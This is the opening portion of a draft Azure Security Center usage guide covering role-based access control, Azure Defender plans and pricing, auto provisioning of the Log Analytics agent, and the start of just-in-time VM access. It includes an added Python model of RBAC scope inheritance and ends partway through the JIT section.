
Security: Azure Security Center – Fundamentals

Scenarios and Usage Guide


Table of Contents

Introduction, p. 1
  1.1 Overview, p. 1
1 Use Role-Based Access Control to manage access to your Azure subscription resources, p. 2
  1.1 Permissions in Azure Security Center, p. 2
  1.2 Roles and Allowed actions, p. 3
  1.3 View access, p. 5
  1.4 Add Access, p. 6
  1.5 Remove Access, p. 7
2 Azure Defender, p. 8
  2.1 Introduction to Azure Defender, p. 8
  2.2 Enable Azure Defender, p. 14
    Enable Azure Defender Quickstart, p. 14
    Enable Azure Defender from Pricing & Settings, p. 15
    Enable Data Collection, p. 17
  2.3 Azure Defender Dashboard, p. 24
    Walk-through Azure Defender Dashboard, p. 24
  2.4 Azure Defender for Servers, p. 25
    Just-in-time (JIT) VM access, p. 25
    Simulate and detect attacks on Linux, p. 32
    Alerts validation, p. 41
    Security Center's integrated EDR solution Microsoft Defender for Endpoint, p. 43
    Azure Defender's integrated vulnerability assessment solution, p. 51
    Adaptive Application Control, p. 54
    File Integrity Monitoring, p. 63
  2.5 Azure Defender for Key Vault, p. 75
    Pre-requisites, p. 76
    Enable Key Vault in Security Center's pricing and settings page, p. 76
    Create an Azure Key Vault and enable Azure Defender protection, p. 77
    Create a new secret in the Key Vault, p. 77
    Simulate a suspicious activity against Key Vault and check Azure Security Center notification, p. 78
    Respond to Azure Defender for Key Vault alerts, p. 80
  2.6 Azure Defender for SQL Servers on Machines, p. 82
    Pre-requisites, p. 82
    Explore vulnerability assessment reports, p. 84
    Azure Defender for SQL alerts, p. 87
  2.7 Azure Defender Security Alerts Guide, p. 87
  2.8 Azure Security Center threat intelligence report, p. 88
    How to access the threat intelligence report, p. 89
3 Connect your non-Azure machines to Security Center, p. 91
    Add non-Azure machines with Azure Arc, p. 91
    Add non-Azure Windows Machines with Getting started, p. 96
    Add non-Azure Linux Machines with Getting started, p. 100
    Connecting computers to Log Analytics gateway, p. 106
    Onboard Windows computers through Windows Administrative Center (WAC), p. 109
    Clean up resources, p. 113
4 Monitor Security Health, p. 115
  4.1 Resource security Hygiene, p. 115
  4.2 Compute Health and Inventory, p. 119
  4.3 Implement Security Recommendations, p. 122
  4.4 Review and Implement Security Recommendations, p. 123
5 Regulatory Compliance, p. 125
  5.1 Assessing your regulatory compliance, p. 125
    Explore the Compliance dashboard, p. 126
    Improve your compliance posture, p. 128
6 Automate Incident Response with Workflow Automation, p. 130
    Create a GitHub account, p. 130
    Explore the Azure Security Center repository, p. 132
  6.2 Create a Network Security Group, p. 132
  6.3 Create Inbound and Outbound Deny Rules for the new NSG, p. 133
  6.4 Create Azure Automation Account and Runbook, p. 135
  6.5 Create a Workflow Automation, p. 143
  6.6 Bypass AppLocker and Remediate, p. 152
  6.7 Troubleshooting Runbook, p. 156
  6.8 Attach the isolated VM's network interface back to previous network, p. 160
7 Secure Score, p. 163
  7.1 Introduction to Secure Score, p. 163
    Try Recommendations grouped Security Controls, p. 164
    How the Secure Score is calculated, p. 165
    Which recommendations are included in the secure score calculations?, p. 168
    Secure score FAQ, p. 169
8 Security Policies, p. 170
  8.1 Introduction to security policies, p. 170
    Using custom security policies, p. 170
    Create a custom initiative, p. 170
    Adding a dynamic compliance package, p. 173
    Update to the Azure CIS 1.1.0 dynamic compliance package, p. 173
9 Azure Policy, p. 175
  9.1 What is Azure Policy?, p. 175
  9.2 How is it different from RBAC?, p. 175
    Policy definition, p. 176
    Prevent misconfigurations, p. 182
10 Log Analytics, p. 187
  10.1 All Security Events, p. 187
  10.2 Failed logons, p. 187
  10.3 Computers with most errors, p. 187
  10.4 Heartbeat missing in the last day, p. 188
  10.5 Processor utilization over the last week, p. 188
  10.6 Query data across workspaces, p. 189
11 Post-Breach Threat Detections, p. 190
  11.1 Pre-requisites, p. 190
  11.2 Executing the Attack, p. 192
  11.3 Reviewing Security Center Alerts, p. 193
    Suspicious SVCHOST process executed, p. 195
    Suspicious Activity Detected, p. 196
    Windows registry persistence method detected, p. 197
    Potential attempt to bypass AppLocker detected, p. 198
  11.4 Using Log Analytics to Hunt Threats, p. 199
12 PowerShell Automation of ASC Tasks, p. 203
  12.1 Install the ASC PowerShell module, p. 203
  12.2 Run module to get alerts, p. 203
  12.3 Setting Security Contact Details Across Multiple Subscriptions (optional), p. 204
13 Continuously export Security Center data, p. 205
14 Management Groups, p. 207
    Overview, p. 207
    Create a management group structure, p. 207
15 Blueprints, p. 209
    Overview, p. 209
    How it's different from Azure Policy, p. 209
    Blueprint definition locations, p. 209
    Blueprint parameters, p. 210
    Create a Blueprint, p. 210
    Assign a blueprint, p. 211
    Track deployment of a blueprint, p. 212
16 Troubleshoot, p. 214
  16.1 Log Analytics agent for Windows, p. 214
    Important troubleshooting sources, p. 214
  16.2 Log Analytics agent for Linux, p. 220
    Issues and Resolutions, p. 227
  16.3 Azure Arc, p. 237
    Agent verbose logging, p. 238
17 Resource Graph, p. 244
    Overview, p. 244
    Explore Resource Graph, p. 244
FAQ, p. 246
  17.2 How does Azure Security Center relate to Azure Sentinel?, p. 246
  17.3 Connect Azure Security Center data to Azure Sentinel, p. 247
  17.4 Exporting data to a SIEM, p. 248
  17.5 What are the Log Analytics Agent Timeouts?, p. 250
  17.6 What can we do with PowerShell?, p. 250
  17.7 What is missing if Log Analytics is not installed?, p. 250

Security: Azure Security Center – Fundamentals, Draft
"SecASC_Tactical Scenarios Guide"
Microsoft Confidential

Introduction
Microsoft Azure Security Center provides unified security management and advanced threat
protection across hybrid cloud workloads. With Security Center, you can apply security policies
across your workloads, limit your exposure to threats, and detect and respond to attacks.

Where possible, this guide will link to online instructions instead of providing them since
Azure screenshots and navigation tend to change often.

1.1 Overview
The following guide will walk you through implementing Azure Security Center (ASC):

• Azure Security Center Permissions with Role-Based Access Control (RBAC)
• Turn on Azure Defender trial and Enable Data Collection
• Add non-Azure machines to Security Center
• Monitor Security Health
• Review and Implement Security Recommendations
• Alerts validation
• Enable Just-in-Time access
• Azure Defender for Key Vault
• Log Analytics
• Simulate and detect attacks on Linux
• Automate Incident Response with Workflow Automation
• Enable File Integrity Monitoring
• Enable Adaptive Application Control
• Post-Breach Threat Detections
• Using PowerShell to get alerts
• Regulatory Compliance
• Security Policies
• Blueprints

Page 1
Security: Azure Security Center – Fundamentals
"SecASC_Tactical Scenarios Guide"
1 Use Role-Based Access Control to manage access to your Azure subscription resources
Azure Role-Based Access Control (RBAC) enables fine-grained access management for Azure.
Using RBAC, you can grant only the amount of access that users need to perform their jobs. This
article helps you get up and running with RBAC in the Azure portal. If you want more details
about how RBAC helps you manage access, see What is Role-Based Access Control.

Within each subscription, you can grant up to 2000 role assignments.

1.1 Permissions in Azure Security Center

Azure Security Center uses Role-Based Access Control (RBAC), which provides built-in roles that
can be assigned to users, groups, and services in Azure.

Security Center assesses the configuration of your resources to identify security issues and
vulnerabilities. In Security Center, you only see information related to a resource when you are
assigned the role of Owner, Contributor, or Reader for the subscription or resource group that a
resource belongs to.

This means that workload owners can see (and action) security recommendations for their
workloads by default, but access outside those roles needs to be delegated. If a person has no
access to a resource, they won’t see that resource in their view from Azure Security Center.

In addition to these roles, there are two specific Security Center roles:

• Security Reader: A user that belongs to this role has viewing rights to Security Center.
The user can view recommendations, alerts, a security policy, and security states, but
cannot make changes.

• Security Administrator: A user that belongs to this role has the same rights as the
Security Reader and can also update the security policy and dismiss alerts and
recommendations. For more information about permissions, please refer to
https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#security-admin.

Page 2
Security: Azure Security Center – Fundamentals
"SecASC_Tactical Scenarios Guide"
1.2 Roles and Allowed actions
The following table displays roles and allowed actions in Security Center. An X indicates that the
action is allowed for that role.

Note that in the table below, Contributor (or greater) access is needed to the resource itself in
order to make a change to the resource directly (“apply security recommendations”).

1.3 View access
You can see who has access to a resource, resource group, or subscription from its main blade in
the Azure portal. For example, if we want to see who has access to one of our resource groups:

1. Select Resource groups in the navigation bar on the left.

2. Select the name of the resource group from the Resource groups blade.

3. Select Access control (IAM) from the left menu.

4. The Access control blade lists all users, groups, and applications that have been granted
access to the resource group.

Notice that some roles are scoped to This resource while others are Inherited from
another scope. Access is either assigned specifically to a resource group or inherited
from an assignment to the parent subscription.

Note
Classic subscription admins and co-admins are considered Owners of a subscription in
the new RBAC model.

1.4 Add Access
You grant access from the resource, resource group, or subscription that is the scope of the role
assignment.

1. Open a resource, resource group or subscription.

2. Select Add on the Access control blade.

3. Select the role that you wish to assign from the Select a role blade.

4. Select the user, group, or application in your directory that you wish to grant access to.
You can search the directory with display names, email addresses, and object identifiers.

5. Select OK to create the assignment. The Adding user popup tracks the progress.

After successfully adding a role assignment, it will appear on the Users blade.
1.5 Remove Access
1. Hover your cursor over the name of the assignment that you want to remove. A check box
appears next to the name.
2. Use the check boxes to select one or more role assignments.
3. Select Remove.
4. Select Yes to confirm the removal.

Inherited assignments cannot be removed. If you need to remove an inherited assignment, you
need to do it at the scope where the role assignment was created. In the Scope column, next to
Inherited there is a link that takes you to the resources where this role was assigned. Go to the
resource listed there to remove the role assignment.

Note
To learn more about RBAC roles, see Built-in Roles and Custom Roles. For more details
about how RBAC helps you manage access, see
https://docs.microsoft.com/en-us/azure/active-directory/role-based-access-control-configure
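The following Python is an added illustration, not part of this guide: it models the rules of sections 1.1 to 1.5 (Owner/Contributor/Reader at the resource, its resource group or its subscription make the resource visible in Security Center; Contributor or greater is needed to apply a recommendation; Security Reader versus Security Admin rights; the 2000 assignments per subscription cap; inherited assignments can only be removed at the scope where they were created). The ARM-style scope strings, the `RbacStore` class and its method names are assumptions made for this example, not an Azure API.

```python
"""Model of Azure RBAC scope inheritance and the Security Center checks it drives.
Scope strings use the ARM resource-ID layout (assumed for this example):
/subscriptions/<sub>[/resourceGroups/<rg>[/providers/<type>/<name>]]."""
from dataclasses import dataclass

ASC_VIEW_ROLES = {"Owner", "Contributor", "Reader"}  # see the resource in ASC (1.1)
APPLY_ROLES = {"Owner", "Contributor"}               # change the resource itself (1.2)
MAX_ASSIGNMENTS_PER_SUBSCRIPTION = 2000              # limit stated in section 1


@dataclass(frozen=True)
class Assignment:
    principal: str
    role: str
    scope: str


class InheritedAssignmentError(Exception):
    """Removal attempted below the scope where the assignment was created (1.5)."""

    def __init__(self, created_at):
        super().__init__(f"inherited assignment; remove it at {created_at}")
        self.created_at = created_at


def parent_scope(scope):
    """Parent of a scope, or None for a subscription (the root of this model)."""
    if "/providers/" in scope:
        return scope.split("/providers/", 1)[0]
    if "/resourceGroups/" in scope:
        return scope.split("/resourceGroups/", 1)[0]
    return None


def scope_chain(scope):
    """The scope followed by its ancestors: resource, resource group, subscription."""
    chain = []
    while scope is not None:
        chain.append(scope)
        scope = parent_scope(scope)
    return chain


class RbacStore:
    def __init__(self, limit=MAX_ASSIGNMENTS_PER_SUBSCRIPTION):
        self.assignments = set()
        self.limit = limit

    def add(self, principal, role, scope):
        """Create an assignment at `scope`, enforcing the per-subscription cap."""
        sub = scope_chain(scope)[-1]
        in_sub = sum(1 for a in self.assignments if scope_chain(a.scope)[-1] == sub)
        if in_sub >= self.limit:
            raise ValueError(f"{sub} already has {self.limit} role assignments")
        self.assignments.add(Assignment(principal, role, scope))

    def effective(self, principal, scope):
        """(role, created_at, inherited) tuples for a principal at `scope`, mirroring the
        'This resource' / 'Inherited' distinction on the Access control (IAM) blade (1.3)."""
        found = []
        for s in scope_chain(scope):
            for a in sorted(self.assignments, key=lambda a: a.role):
                if a.principal == principal and a.scope == s:
                    found.append((a.role, s, s != scope))
        return found

    def roles_at(self, principal, scope):
        return {role for role, _, _ in self.effective(principal, scope)}

    def can_view_in_asc(self, principal, resource_scope):
        """Owner/Contributor/Reader at the resource, its group or its subscription (1.1)."""
        return bool(self.roles_at(principal, resource_scope) & ASC_VIEW_ROLES)

    def can_apply_recommendation(self, principal, resource_scope):
        """Contributor or greater on the resource is needed to change it (1.2)."""
        return bool(self.roles_at(principal, resource_scope) & APPLY_ROLES)

    def security_center_rights(self, principal, subscription_scope):
        """'admin' (update policy, dismiss alerts), 'read' (view only) or None (1.1)."""
        roles = self.roles_at(principal, subscription_scope)
        if "Security Admin" in roles:
            return "admin"
        if "Security Reader" in roles:
            return "read"
        return None

    def remove(self, principal, role, scope):
        """Remove a direct assignment; an inherited one must be removed where it was created."""
        direct = Assignment(principal, role, scope)
        if direct in self.assignments:
            self.assignments.remove(direct)
            return
        for ancestor in scope_chain(scope)[1:]:
            if Assignment(principal, role, ancestor) in self.assignments:
                raise InheritedAssignmentError(ancestor)
        raise KeyError(f"{principal} has no {role} assignment at {scope}")
```

Run it against a resource group and a VM scope to see which principals Security Center would show the VM to, and which would be refused when trying to remove a subscription-level assignment from the resource group blade.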

2 Azure Defender

2.1 Introduction to Azure Defender


Azure Security Center's features cover the two broad pillars of cloud security:

• Cloud security posture management (CSPM) - Security Center is available for free to
all Azure users. The free experience includes CSPM features such as secure score,
detection of security misconfigurations in your Azure machines, asset inventory, and
more. Use these CSPM features to strengthen your hybrid cloud posture and track
compliance with the built-in policies.

• Cloud workload protection (CWP) - Security Center's integrated cloud workload
protection platform (CWPP), Azure Defender, brings advanced, intelligent protection of
your Azure and hybrid resources and workloads. Enabling Azure Defender brings a range
of additional security features as described on this page. In addition to the built-in
policies, when you've enabled any Azure Defender plan, you can add custom policies and
initiatives. You can add regulatory standards - such as NIST and Azure CIS - as well as
the Azure Security Benchmark for a truly customized view of your compliance.

The Azure Defender dashboard in Security Center provides visibility and control of the
CWP features for your environment.

What resource types can Azure Defender secure?

Azure Defender provides security alerts and advanced threat protection for virtual machines,
SQL databases, containers, web applications, your network, and more.

When you enable Azure Defender from the Pricing and settings area of Azure Security Center,
the following Defender plans are all enabled simultaneously and provide comprehensive
defenses for the compute, data, and service layers of your environment:

• Azure Defender for servers
• Azure Defender for App Service
• Azure Defender for Storage
• Azure Defender for SQL
• Azure Defender for Kubernetes
• Azure Defender for container registries
• Azure Defender for Key Vault

Hybrid cloud protection

As well as defending your Azure environment, you can add Azure Defender capabilities to your
hybrid cloud environment:

• Protect your non-Azure servers
• Protect your virtual machines in other clouds (such as AWS and GCP)

You'll get customized threat intelligence and prioritized alerts according to your specific
environment so that you can focus on what matters the most.

To extend protection to virtual machines and SQL databases that are in other clouds or
on-premises, deploy Azure Arc and enable Azure Defender. Azure Arc for servers is a free
service, but services that are used on Arc enabled servers, for example Azure Defender,
will be charged as per the pricing for that service. Learn more in Add non-Azure machines
with Azure Arc.

Pricing of Azure Security Center

Free option vs Azure Defender enabled

Azure Defender OFF (Free) - Security Center without Azure Defender is enabled for free on all
your Azure subscriptions when you visit the Azure Security Center dashboard in the Azure portal
for the first time, or if enabled programmatically via API. Using this free mode provides security
policy, continuous security assessment, and actionable security recommendations to help you
protect your Azure resources.

Azure Defender ON - Enabling Azure Defender extends the capabilities of the free mode to
workloads running in private and other public clouds, providing unified security management
and threat protection across your hybrid cloud workloads. Some of the major features of Azure
Defender:

Microsoft Defender for Endpoint - Azure Defender for servers includes Microsoft Defender for
Endpoint for comprehensive endpoint detection and response (EDR). Learn more about the
benefits of using Microsoft Defender for Endpoint together with Azure Defender in Use Security
Center's integrated EDR solution.

Vulnerability scanning for virtual machines and container registries - Easily deploy a
scanner to all of your virtual machines that provides the industry's most advanced solution for
vulnerability management. View, investigate, and remediate the findings directly within Security
Center.

Hybrid security – Get a unified view of security across all of your on-premises and cloud
workloads. Apply security policies and continuously assess the security of your hybrid cloud
workloads to ensure compliance with security standards. Collect, search, and analyze security
data from multiple sources, including firewalls and other partner solutions.

Threat protection alerts - Advanced behavioral analytics and the Microsoft Intelligent Security
Graph provide an edge over evolving cyber-attacks. Leverage built-in behavioral analytics and
machine learning to identify attacks and zero-day exploits. Monitor networks, machines, and
cloud services for incoming attacks and post-breach activity. Streamline investigation with
interactive tools and contextual threat intelligence.

Access and application controls - Block malware and other unwanted applications by applying
machine learning powered recommendations adapted to your specific workloads to create allow
and deny lists. Reduce the network attack surface with just-in-time, controlled access to
management ports on Azure VMs. This drastically reduces exposure to brute force and other
network attacks.

Container security features - Benefit from vulnerability management and real-time threat
protection for your containerized environments. When enabling Azure Defender for
container registries, it may take up to 12 hours until all the features are enabled.
Charges are based on the number of unique container images pushed to your connected
registry. After an image has been scanned once, you won't be charged for it again unless
it's modified and pushed once more.

Pricing details

Azure Security Center protects Azure, on prem and hybrid resources through its Free tier and its
integration with Azure Defender.

When you enable Azure Defender, we automatically enroll and start protecting all your
resources unless you explicitly decide to opt-out. For any resource that is protected by Azure
Defender, you will be charged per the pricing model below.

Features                                                   Azure Security Center free tier   Azure Defender
Continuous assessment and security recommendations         X                                 X
Azure secure score                                         X                                 X
Just in time VM Access                                     -                                 X
Adaptive application controls and network hardening        -                                 X
Regulatory compliance dashboard and reports                -                                 X
Threat protection for Azure VMs and non-Azure servers      -                                 X
(including Server EDR)
Threat protection for PaaS services                        -                                 X
Microsoft Defender for Endpoint (servers)                  -                                 X

(The X marks did not survive extraction; they are reconstructed from the feature
descriptions above: the free tier covers continuous assessment, recommendations and
secure score, and Azure Defender adds the remaining rows.)

For pricing of the threat protection capabilities that Azure Defender provides, please
visit the Azure Defender Pricing Page.

Try Azure Defender free for 30 days

Azure Defender is free for the first 30 days. At the end of 30 days, should you choose to
continue using the service, we'll automatically start charging for usage.

FAQ Pricing and Billing

Can I enable Azure Defender for servers on a subset of servers in my subscription?

No. When you enable Azure Defender for servers on a subscription, all the servers in the
subscription will be protected by Azure Defender.

An alternative is to enable Azure Defender for servers at the Log Analytics workspace level. If you do
this, only servers reporting to that workspace will be protected and billed. However, several
capabilities will be unavailable. These include just-in-time VM access, network detections, regulatory
compliance, adaptive network hardening, adaptive application control, and more.

My subscription has Azure Defender for servers enabled. Do I pay for servers that aren't running?

No. When you enable Azure Defender for servers on a subscription, you'll be billed hourly for
running servers only. You won't be charged for any server that's turned off, during the time it's off.
This also applies to the other resource types protected by Security Center.

Will I be charged for machines without the Log Analytics agent installed?

Yes. When you enable Azure Defender for servers on a subscription, the machines in that
subscription get a range of protections even if you haven't installed the Log Analytics agent.

If a Log Analytics agent reports to multiple workspaces, will I be charged twice?

Yes. If you've configured your Log Analytics agent to send data to two or more different Log
Analytics workspaces (multi-homing), you'll be charged for every workspace that has a 'Security' or
'AntiMalware' solution installed.

If a Log Analytics agent reports to multiple workspaces, is the 500-MB free data ingestion
available on all of them?

Yes. If you've configured your Log Analytics agent to send data to two or more different Log
Analytics workspaces (multi-homing), you'll get 500-MB free data ingestion. It's calculated per node,
per reported workspace, per day, and available for every workspace that has a 'Security' or
'AntiMalware' solution installed. You'll be charged for any data ingested over the 500 MB.

How can I track who in my organization made Azure Defender changes in Azure
Security Center?

Azure Subscriptions may have multiple administrators with permissions to change the pricing
settings. To find out which user made a change, use the Azure Activity Log.
If the user's info isn't listed in the Event initiated by column, explore the event for the relevant
details.

2.2 Enable Azure Defender

Prerequisites

To get started with Security Center, you must have a subscription to Microsoft Azure. If you do
not have a subscription, you can sign up for a free account.

To enable Azure Defender on a subscription, you must be assigned the role of Subscription
Owner, Subscription Contributor, or Security Admin.

Enable Azure Defender Quickstart

Security Center has a quickstart option that helps you enable Azure Defender on
multiple subscriptions and workspaces. If you want to use the quickstart option to enable Azure
Defender on multiple subscriptions and workspaces, continue with the steps below. You can also
enable Azure Defender on a single subscription using the Pricing & settings option; if you want
to use the Pricing & settings option, skip to the next section.

1. From Security Center's sidebar, select Getting started.

2. The Upgrade tab lists subscriptions and workspaces eligible for onboarding.
3. From the Select workspaces to enable Azure Defender on list, select the workspaces and
subscriptions to upgrade.

Important:

• If you select subscriptions and workspaces that aren't eligible for trial, the next step will
upgrade them and charges will begin.
• If you select a workspace that's eligible for a free trial, the next step will begin a trial.

4. Select Upgrade to enable Azure Defender.

Enable Azure Defender from Pricing & Settings

You can protect an entire Azure subscription with Azure Defender and the protections will be
inherited by all resources within the subscription.

To enable Azure Defender:

1. From Security Center's main menu, select Pricing & settings.

2. Select the subscription that you want to upgrade.

3. Select Azure Defender on to upgrade.

4. Select Save.

Important:

• To enable all Security Center features including threat protection capabilities,
you must enable Azure Defender on the subscription containing the applicable
workloads.
• Enabling Azure Defender at the workspace level doesn't enable just-in-time VM
access, adaptive application controls, and network detections for Azure resources.
In addition, the only Azure Defender plans available at the workspace level are
Azure Defender for servers and Azure Defender for SQL servers on machines.
• You can enable Azure Defender for Storage accounts at either the subscription
level or resource level. You can enable Azure Defender for SQL at either the
subscription level or resource level. You can enable threat protection for Azure
Database for MariaDB, MySQL, or PostgreSQL at the resource level only.

Enable Data Collection

Security Center collects data from your Azure virtual machines (VMs), virtual machine scale sets,
IaaS containers, and non-Azure (including on-premises) machines to monitor for security
vulnerabilities and threats.

Data collection is required to provide visibility into missing updates, misconfigured OS security
settings, endpoint protection status, and health and threat protection. Data collection is only
needed for compute resources (VMs, virtual machine scale sets, IaaS containers, and non-Azure
computers). You can benefit from Azure Security Center even if you don’t provision agents;
however, you will have limited security and the capabilities listed above are not supported.

Data is collected using:

• The Log Analytics agent, which reads various security-related configurations and event
logs from the machine and copies the data to your workspace for analysis. Examples of
such data are: operating system type and version, operating system logs (Windows event
logs), running processes, machine name, IP addresses, and logged in user.
• Security extensions, such as the Azure Policy Add-on for Kubernetes, which can also
provide data to Security Center regarding specialized resource types.

Why use auto provisioning?

Any of the agents and extensions described on this page can be installed manually (see Manual
installation of the Log Analytics agent). However, auto provisioning reduces management
overhead by installing all required agents and extensions on existing - and new - machines to
ensure faster security coverage for all supported resources.

We recommend enabling auto provisioning, but it's disabled by default.

How does auto provisioning work?

Security Center's auto provisioning settings have a toggle for each type of supported extension.
When you enable auto provisioning of an extension, you assign the appropriate Deploy if not
exists policy to make sure that the extension is provisioned on all existing and future resources
of that type.
Enable auto provisioning in the customer subscription(s) - Auto provisioning agents and
extensions from Azure Security Center | Microsoft Docs

Enable automatic provisioning of Log Analytics Agent

When automatic provisioning is on for the Log Analytics agent, Security Center deploys the
agent on all supported Azure VMs and any new ones created. For the list of supported
platforms, see Supported platforms in Azure Security Center.

To enable auto provisioning of the Log Analytics agent:

1. From Security Center's menu, select Pricing & settings.

2. Select the relevant subscription.

3. In the Auto provisioning page, set the agent's status to On.

4. From the configuration options pane, define the workspace to use. You have two options:

• Connect Azure VMs to the default workspace(s) created by Security Center

• Connect Azure VMs to a different workspace

Connect Azure VMs to the default workspace(s) created by Security Center - Security
Center creates a new resource group and default workspace in the same geolocation, and
connects the agent to that workspace. If a subscription contains VMs from multiple
geolocations, Security Center creates multiple workspaces to ensure compliance with data
privacy requirements.

The naming convention for the workspace and resource group is:

• Workspace: DefaultWorkspace-[subscription-ID]-[geo]

• Resource Group: DefaultResourceGroup-[geo]

Security Center automatically enables a Security Center solution on the workspace per the
pricing tier set for the subscription.

Connect Azure VMs to a different workspace - From the dropdown list, select the workspace
to store collected data. The dropdown list includes all workspaces across all of your
subscriptions. You can use this option to collect data from virtual machines running in different
subscriptions and store it all in your selected workspace.

If you already have an existing Log Analytics workspace, you might want to use the same
workspace (requires read and write permissions on the workspace). This option is useful if you're
using a centralized workspace in your organization and want to use it for security data
collection. Learn more in Manage access to log data and workspaces in Azure Monitor.

If your selected workspace already has a Security or SecurityCenterFree solution enabled, the
pricing will be set automatically. If not, install a Security Center solution on the workspace:
A. From Security Center's menu, open Pricing & settings.
B. Select the workspace to which you'll be connecting the agents.
C. Select Azure Defender on or Azure Defender off.

5. From the Windows security events configuration, select the amount of raw event data to
store:

• None – Disable security event storage. This is the default setting.
• Minimal – A small set of events for when you want to minimize the event volume.
• Common – A set of events that satisfies most customers and provides a full audit trail.
• All events – For customers who want to make sure all events are stored.

Azure Defender is required for storing Windows security event data. For more information on
event types, see the section What event types are stored for "Common" and "Minimal"?

Selecting a data collection tier in Azure Security Center only affects the storage of security
events in your Log Analytics workspace. The Log Analytics agent will still collect and analyze the
security events required for Security Center’s threat protection, regardless of the level of security
events you choose to store in your workspace. Choosing to store security events enables
investigation, search, and auditing of those events in your workspace.

6. Select Apply in the configuration pane.

7. Select Save. If a workspace needs to be provisioned, agent installation might take up to 25
minutes.
8. You'll be asked if you want to reconfigure monitored VMs that were previously connected to
a default workspace:

• No - your new workspace settings will only be applied to newly discovered VMs that
don't have the Log Analytics agent installed.
• Yes - your new workspace settings will apply to all VMs and every VM currently
connected to a Security Center created workspace will be reconnected to the new
target workspace.

Important: If you select Yes, don't delete the workspace(s) created by Security Center
until all VMs have been reconnected to the new target workspace. This operation fails if
a workspace is deleted too early.

Enable auto provisioning of extensions

To enable automatic provisioning of an extension other than the Log Analytics agent:

1. From Security Center's menu in the Azure portal, select Pricing & settings.
2. Select the relevant subscription.
3. Select Auto provisioning.
4. If you're enabling auto provisioning for the Microsoft Dependency agent, ensure the Log
Analytics agent is set to auto deploy too.
5. Toggle the status to On for the relevant extension.
6. Select Save. The Azure policy is assigned and a remediation task is created.

Extension                                             Policy
Policy Add-on for Kubernetes                          Deploy Azure Policy Add-on to Azure Kubernetes Service clusters
Microsoft Dependency agent (preview) (Windows VMs)    Deploy Dependency agent for Windows virtual machines
Microsoft Dependency agent (preview) (Linux VMs)      Deploy Dependency agent for Linux virtual machines

What event types are stored for "Common" and "Minimal"?

These sets were designed to address typical scenarios. Make sure to evaluate which one fits your
needs before implementing it.

To determine the events for the Common and Minimal options, we worked with customers and
industry standards to learn about the unfiltered frequency of each event and their usage. We
used the following guidelines in this process:
• Minimal - Make sure that this set covers only events that might indicate a
successful breach and important events that have a very low volume. For example,
this set contains user successful and failed login (event IDs 4624, 4625), but it
doesn’t contain sign out which is important for auditing but not meaningful for
detection and has relatively high volume. Most of the data volume of this set is the
login events and process creation event (event ID 4688).
• Common - Provide a full user audit trail in this set. For example, this set contains
both user logins and user sign outs (event ID 4634). We include auditing actions
like security group changes, key domain controller Kerberos operations, and other
events that are recommended by industry organizations.
Events that have very low volume were included in the Common set, because the main motivation
for choosing it over All events is to reduce volume, not to filter out specific events.

Information for Azure Sentinel users

Users of Azure Sentinel: note that security events collection within the context of a single
workspace can be configured from either Azure Security Center or Azure Sentinel, but not both.
If you're planning to add Azure Sentinel to a workspace that is already getting Azure Defender
alerts from Azure Security Center, and is set to collect Security Events, you have two options:
• Leave the Security Events collection in Azure Security Center as is. You will be able to query
and analyze these events in Azure Sentinel as well as in Azure Defender. You will not,
however, be able to monitor the connector's connectivity status or change its configuration
in Azure Sentinel. If this is important to you, consider the second option.
• Disable Security Events collection in Azure Security Center (by setting Windows security
events to None in the configuration of your Log Analytics agent). Then add the Security
Events connector in Azure Sentinel. As with the first option, you will be able to query and
analyze events in both Azure Sentinel and Azure Defender/ASC, but you will now be able to
monitor the connector's connectivity status or change its configuration in - and only in -
Azure Sentinel.

Disable auto provisioning

When you disable auto provisioning, agents will not be provisioned on new VMs.

Note:
Disabling automatic provisioning limits security monitoring for your resources.

To turn off automatic provisioning of an agent:

1. From Security Center's menu in the portal, select Pricing & settings.
2. Select the relevant subscription.
3. Select Auto provisioning.
4. Toggle the status to Off for the relevant agent.

5. Select Save. When auto provisioning is disabled, the default workspace configuration section
is not displayed.

Note:

Disabling automatic provisioning does not remove the Log Analytics agent from Azure VMs
where the agent was provisioned. For information on removing the OMS extension, see How do
I remove OMS extensions installed by Security Center.

2.3 Azure Defender Dashboard
The Azure Defender dashboard provides:
• Visibility into your Azure Defender coverage across your different resource
types
• Links to configure advanced threat protection capabilities
• The onboarding state and agent installation
• Azure Defender threat detection alerts

To access the Azure Defender dashboard, select Azure Defender from the Cloud Security
section of Security Center's menu.

Walk-through: Azure Defender Dashboard

In the customer's environment, walk through each of the Azure Defender sections.

The dashboard includes the following sections:

1. Azure Defender coverage - Here you can see the resources types that are in your
subscription and eligible for protection by Azure Defender. Wherever relevant,
you'll have the option to upgrade too. If you want to upgrade all possible eligible
resources, select Upgrade all.
2. Security alerts area - When Azure Defender detects a threat in any area of your
environment, it generates an alert. These alerts describe details of the affected
resources, suggested remediation steps, and in some cases an option to trigger a
logic app in response. Selecting anywhere in this graph opens the Security alerts
page.
3. Advanced protection - Azure Defender includes many advanced threat protection
capabilities for virtual machines, SQL databases, containers, web applications, your
network, and more. In this advanced protection section, you can see the status of
the resources in your selected subscriptions for each of these protections. Select
any of them to go directly to the configuration area for that protection type.
4. Insights - This rolling pane of news, suggested reading, and high priority alerts
gives Security Center's insights into pressing security matters that are relevant to
you and your subscription. Whether it's a list of high severity CVEs discovered on
your VMs by a vulnerability analysis tool, or a new blog post by a member of the
Security Center team, you'll find it here in the Insights pane of your Azure Defender
dashboard.

2.4 Azure Defender for Servers

Just-in-time (JIT) VM access

Threat actors actively hunt accessible machines with open management ports, like RDP or SSH.
All of your virtual machines are potential targets for an attack. When a VM is successfully
compromised, it's used as the entry point to attack further resources within your environment.

Prerequisites

JIT requires Azure Defender for servers to be enabled on the subscription.

Reader and SecurityReader roles can both view the JIT status and parameters.

Enable Azure Defender for Servers in Security Center's Pricing & settings
page

Go to Security Center's Pricing & settings page, select the relevant subscription, and
enable Servers in the Azure Defender plans page.

How JIT operates with network security groups and Azure Firewall

When you enable just-in-time VM access, you can select the ports on the VM to which inbound
traffic will be blocked. Security Center ensures "deny all inbound traffic" rules exist for your
selected ports in the network security group (NSG) and Azure Firewall rules. These rules restrict
access to your Azure VMs’ management ports and defend them from attack.

If other rules already exist for the selected ports, then those existing rules take priority over the
new "deny all inbound traffic" rules. If there are no existing rules on the selected ports, then the
new rules take top priority in the NSG and Azure Firewall.

When a user requests access to a VM, Security Center checks that the user has Azure role-based
access control (Azure RBAC) permissions for that VM. If the request is approved, Security Center
configures the NSGs and Azure Firewall to allow inbound traffic to the selected ports from the
relevant IP address (or range), for the amount of time that was specified. After the time has
expired, Security Center restores the NSGs to their previous states. Connections that are already
established are not interrupted.
